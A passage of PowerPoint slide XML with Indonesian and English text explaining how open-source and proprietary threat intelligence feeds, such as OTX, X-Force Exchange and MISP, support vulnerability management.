            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melihat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanskap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Common threat feed platforms include AlienVault’s Open Threat Exchange (OTX), IBM’s X-Force Exchange, and Recorded Future. These platforms gather, analyze, and distribute information about new and emerging threats, providing actionable intelligence that can be incorporated into an organization’s vulnerability management practices and sometimes directly into security infrastructure tools to provide up-to-the-minute protections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID"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Threat feeds significantly improve vulnerability identification by providing timely information and context about new threats that traditional vulnerability scanning does not provide. Threat feeds provide information that helps organizations focus their remediation efforts on the most relevant and potentially damaging vulnerabilities first. This proactive approach can significantly reduce the time between discovering a vulnerability and its remediation, thus minimizing the organization’s exposure to potential attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketiga</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> real-time yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berharga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dunia maya </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diintegrasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkontribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pilihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bermuara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Cyber Threat Alliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> MISP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gratis dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> orang, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbatas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedalaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecanggihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpemilik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komprehensif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>wawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analitik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>profil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kombinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed open-source dan proprietary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseimbangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cakupan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
